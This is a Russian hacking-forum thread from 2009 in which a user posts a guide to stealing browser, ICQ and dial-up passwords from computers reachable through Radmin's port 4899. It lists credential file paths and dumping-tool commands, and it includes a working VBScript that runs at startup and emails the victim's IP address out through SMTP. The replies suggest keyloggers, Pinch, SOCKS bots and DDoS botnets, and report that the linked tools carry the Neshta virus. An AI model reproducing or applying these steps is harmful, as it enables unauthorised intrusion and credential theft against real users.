Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Статьи (https://forum.antichat.xyz/forumdisplay.php?f=30)
-   -   Скрыто тырим пароли от Opera , Mozilla , icq6.5 и пароль от инета [через 4899 порт] (https://forum.antichat.xyz/showthread.php?t=156660)

hack-win32 15.11.2009 11:02

Скрыто тырим пароли от Opera , Mozilla , icq6.5 и пароль от инета [через 4899 порт]
 
Cейчас я покажу как стырить пароли от Opera , IE , Mozilla , ICQ и пароли от инета .
Через 4899 порт . Как всегда сканим диапазон на открытый порт . Нам нужно передать файлы и воспользоватся telnet'ом .
Cookies от IE находятся в C:\Documents and Settings\[Имя_Юзера]\Cookies - копируем всё на комп . Здесь все кукисы берем те которые нам нужны .
Их много берём что то типо user@mail[1].txt здесь будут куки от mail.ru . Ну здесь куки от всех сайтов .
Пароль от Icq в C:\Documents and Settings\[Имя_Юзера]\Application Data\ICQ\[uin_юзера]\Owner.mdb .
Пароли от Opera'ы в C:\Documents and Settings\[Имя_Юзера]\Application Data\Opera\Opera\profile\wand.dat
Теперь стырим Cookies от Mozill'ы вспомошью проги Mozilla Cookies View . Кидаем прогу на диск "С". И пишем в Telnet .
Код:

cd\
mzcv.exe /stext pass_mozilla.txt - (mzcv название проги вкратце) ну и всё на диске появится pass_mozilla.txt там будут куки от Мозилы. напишем ламреру сообщение .

И пасы от инета стырим прогой Dialupass , также кидаем на диск "С" и пишем в Telnet.
Код:

cd\
x.exe /stext pass_inet.txt

Теперь надо всё расшифровать . Для этого нужны проги Unwand -(расшифровывает пароли в Oper'е) и ICQ6 hash recover -(расшифровывает пароль от icq6)
Куки могут неподойти так как они долго нежевут , а расшифровать пас от ICQ легко .
Указываем путь к Owner.mdb bи получаем md5 хеш , расшифровываем его и всё .
Теперь покажу для текех у кого ip динамический , как сделать чтобы ip приходил при включении компа . Просто помешаем mail.vbs в автозагрузку и всё .
Ну вот и всё каждый раз при включении ипы будет приходить на мыло .
Тело mail.vbs :
Код:

Set WshShell = CreateObject("WScript.Shell")
WshShell.Run "cmd.exe /c ipconfig > C:\WINDOWS\ip.txt", 0, false

WScript.Sleep (5000)

Set S = CreateObject("Wscript.Shell")
set FSO=createobject("scripting.filesystemobject")
Call SendPost("smtp.mail.ru","куда_придёт ипы@mail.ru","левое мыло@mail.ru","IP ЛАМЕРА","hacked by hack-win32")
Function SendPost(strSMTP_Server,strTo,strFrom,strSubject,strBody)
Set iMsg=CreateObject("CDO.Message")
Set iConf=CreateObject("CDO.Configuration")
Set Flds=iConf.Fields
Flds.Item("http://schemas.microsoft.com/cdo/configuration/sendusing")=2
Flds.Item("http://schemas.microsoft.com/cdo/configuration/smtpauthenticate")=1
Flds.Item("http://schemas.microsoft.com/cdo/configuration/sendusername")="логин левого мыла без"@mail.ru""
Flds.Item("http://schemas.microsoft.com/cdo/configuration/sendpassword")="пас левого мыла"
Flds.Item("http://schemas.microsoft.com/cdo/configuration/smtpserver")="smtp.mail.ru"
Flds.Item("http://schemas.microsoft.com/cdo/configuration/smtpserverport")=25
Flds.Update
iMsg.Configuration=iConf
iMsg.To=strTo
iMsg.From=strFrom
iMsg.Subject=strSubject
iMsg.TextBody=strBody
iMsg.AddAttachment "C:\WINDOWS\ip.txt"
iMsg.Send
End Function
Set iMsg=Nothing
Set iConf=Nothing
Set Flds=Nothing

Код:

ICQ6 hash recover
Unwand
Скачать

Видео к статье --> Скачать

(с)hack-win32 другой ник hack001

X-RayBlade 15.11.2009 11:55

Не у всех винда ;)
Но старался, это видно

Root-access 15.11.2009 16:12

Старался-то старался...
Но вот всё палевно и неактуально.
Пригодилось бы несколько лет назад, ещё до создания пинча.

hack-win32 15.11.2009 16:17

Цитата:

Сообщение от Root-access
Старался-то старался...
Но вот всё палевно и неактуально.
Пригодилось бы несколько лет назад, ещё до создания пинча.

вот чё здесь палевно ? вся работа через telnet и передачу файлов .

Root-access 15.11.2009 16:20

Цитата:

Сообщение от hack-win32
вот чё здесь палевно ? вся работа через telnet и передачу файлов .

Беспалевно это будет только для тупого юзера, а у тупых юзеров врядли что-то ценное в пассах.

Способ совершенно неуниверсален, фаервол будет блочить, порт может быть закрыт, к тому же хак-скрипты на vbs остались в прошлом - всё будет палиться.

X-RayBlade 15.11.2009 16:31

Цитата:

Сообщение от Root-access
Беспалевно это будет только для тупого юзера, а у тупых юзеров врядли что-то ценное в пассах.

Способ совершенно неуниверсален, фаервол будет блочить, порт может быть закрыт, к тому же хак-скрипты на vbs остались в прошлом - всё будет палиться.

Все начинается с самых азов. Человек проявил инициативу, а это уже хорошо :)

Root-access 15.11.2009 16:34

Цитата:

Сообщение от X-RayBlade
Все начинается с самых азов. Человек проявил инициативу, а это уже хорошо :)

Конечно, я его и не осуждаю, это хорошо, может он в итоге трой хороший напишет.

aqqa 15.11.2009 16:34

Ещё круто када 25 порт закрыт,пароли хер прийдут!

Xcontrol212 15.11.2009 17:23

Цитата:

Беспалевно это будет только для тупого юзера, а у тупых юзеров врядли что-то ценное в пассах.

Способ совершенно неуниверсален, фаервол будет блочить, порт может быть закрыт, к тому же хак-скрипты на vbs остались в прошлом - всё будет палиться.
можно сделать так,когда например взломали чужой компьютер через метасплоит,тут то статья ТС нам и пригодиться и способ достаточно актуален

Цитата:

Ещё круто када 25 порт закрыт,пароли хер прийдут!
а разве порт сменить нельзя?))

Цитата:

Беспалевно это будет только для тупого юзера, а у тупых юзеров врядли что-то ценное в пассах.
я уверен на 99%,что ты не заметишь,как тебя хекнут и получать доступ к твоей командной строке через свежий сплоит под висту например)

aqqa 15.11.2009 17:27

Цитата:

Сообщение от Xcontrol212
можно сделать так,когда например взломали чужой компьютер через метасплоит,тут то статья ТС нам и пригодиться и способ достаточно актуален


а разве порт сменить нельзя?))


я уверен на 99%,что ты не заметишь,как тебя хекнут и получать доступ к твоей командной строке через свежий сплоит под висту например)

Вобщето smtp на мэйле работает по 25 порту, и по 2525 кажется.....Если они закрыты *** получится
и потом если метасплойтом получить доступ к командной строке то нахуя гародить какие-то скрипты, когда можо напрямую к файлам добраться?

Xcontrol212 15.11.2009 17:33

знаю,что SMTP работает на 25,ну я имел виду,что напрмиер у Радмина можно поменять порт с 4899 на любой из существующих портов)
Цитата:

и потом если метасплойтом получить доступ к командной строке то нахуя гародить какие-то скрипты, когда можо напрямую к файлам добраться?
и радмином можно получить доступ;)
ТС делает же все через радмин;)

aqqa 15.11.2009 17:34

Цитата:

Сообщение от Xcontrol212
знаю,что SMTP работает на 25,ну я имел виду,что напрмиер у Радмина можно поменять порт с 4899 на любой из существующих портов)

и радмином можно получить доступ;)
ТС делает же все через радмин;)

чет я про радмин не заметил,я тока код глянул...
Ну тогда ваще непонимаю зачем скрипт было писать...

Root-access 15.11.2009 17:38

Цитата:

Сообщение от Xcontrol212
знаю,что SMTP работает на 25,ну я имел виду,что напрмиер у Радмина можно поменять порт с 4899 на любой из существующих портов)

и радмином можно получить доступ;)
ТС делает же все через радмин;)


Дан, ты не в теме, он через telnet делает.

hack-win32 15.11.2009 17:56

Цитата:

Сообщение от aqqa
чет я про радмин не заметил,я тока код глянул...
Ну тогда ваще непонимаю зачем скрипт было писать...

какие скрипты ? там только один скрипт для оправки ипы на мыло при включении компа

Xcontrol212 15.11.2009 17:59

Цитата:

Дан, ты не в теме, он через telnet делает.
читай название темы:Скрыто тырим пароли от Opera , Mozilla , icq6.5 и пароль от инета [через 4899 порт]
Данный порт использует программа Radmin и там встроенный telnet и передача файлов:)

aqqa 15.11.2009 18:04

Цитата:

Сообщение от hack-win32
какие скрипты ? там только один скрипт для оправки ипы на мыло при включении компа

он самый

NeoX 16.11.2009 14:14

в прогах трой! =\

Neshta, переделывает ехешник что незя прогу запустить какую либо.

sTe[A]LeR 16.11.2009 15:34

Цитата:

Сообщение от NeoX
в прогах трой! =\

Neshta, переделывает ехешник что незя прогу запустить какую либо.

норм тока 1 прога, которая расшифровывает пассы от оперы, а прога для аськи трой

NeoX 16.11.2009 15:38

угу, а я открыл его + антивир отрубил =\\ повезло фаервол закричал, все исправил.

ixtor1 16.11.2009 15:50

тс,извини а статейка то раньше вроде на другом ресурсе появилась тут

Dyxxx 18.11.2009 13:26

какае-то лажа а не статья =\

hack-win32 19.11.2009 10:36

Цитата:

Сообщение от Dyxxx
какае-то лажа а не статья =\

если у тебя что-то неполучается это незначить что статья лажа

Dyxxx 19.11.2009 11:20

во первых что тут может не получаться? во вторых это не статья а полное гумно, не понимаю почему ее не удалят.
здесь нет ничего стоящего, вообще ничего нет.

Dr1ver 19.11.2009 11:23

Пусть будет, вдруг пригодится

SQLHACK 19.11.2009 12:42

кал!
То что описано здесь, в реальной жизни не пригодится никогда.
Слишком много условий которые должны исполнится.

slesh 19.11.2009 12:55

Почитал - таким образом добыть пароли ты сможешь у 0,00001% людей.
Это тоже самое что ограбить банк при условии, что сигнализация нерабочая, пьяные охранники спят и кто-то случайно забыл закрыть сейф.

Xcontrol212 19.11.2009 15:20

Цитата:

Почитал - таким образом добыть пароли ты сможешь у 0,00001% людей.
Это тоже самое что ограбить банк при условии, что сигнализация нерабочая, пьяные охранники спят и кто-то случайно забыл закрыть сейф.
Почему же,процент добычи паролей при установленной радмине достаточно велик..
Например вы нашли бажную тачку и ломанули через определенный эксплоит,хотим достать пароль например ака от вконтакта,жертва использует Opera,и способом
ТС можно достать ак

shell_c0de 19.11.2009 16:08

Если имеется доступ (с паролем по дефолту 12345678) через радмин то зачем все это ? закидаещ через файл менеджер пинча или кейлоггер и запускаеш через telnet радмина и все ....

P/S B мне кажется что таких компов с открытым портом и паролем по дефолту даволно много но что с таких юзеров можно иметь кривую 9ти знак ?

P/S Лучше у жертвы поднять соксбот или добавит в ddosботнет ...

Xcontrol212 19.11.2009 16:11

Цитата:

Сообщение от shell_c0de
Если имеется доступ (с паролем по дефолту 12345678) через радмин то зачем все это ? закидаещ через файл менеджер пинча или кейлоггер и запускаеш через telnet радмина и все ....

P/S B мне кажется что таких компов с открытым портом и паролем по дефолту даволно много но что с таких юзеров можно иметь кривую 9ти знак ?

P/S Лучше у жертвы поднять соксбот или добавит в ddosботнет ...

ну как я сказал,что получим доступ через опред.эксплоит)
Там могут быть много чего,и зачем ломать дедики и добавлять туда ехе,там заебешься ботнет собирать)
Пинч не ворует пасы от последних версий фф,ие и оперы

WeStOne(INV) 29.11.2009 07:24

Цитата:

Сообщение от Ruslan1817
А не проше когда стырил прогой MPR все узнать ?

Проще только пинч :D

sam732 29.11.2009 13:14

по ссылке на openfile в папке icq - вирус НЭШТА!! - такая поебень заражает все экзешники, хуже этого вируса я еще не сталкивался


Время: 06:23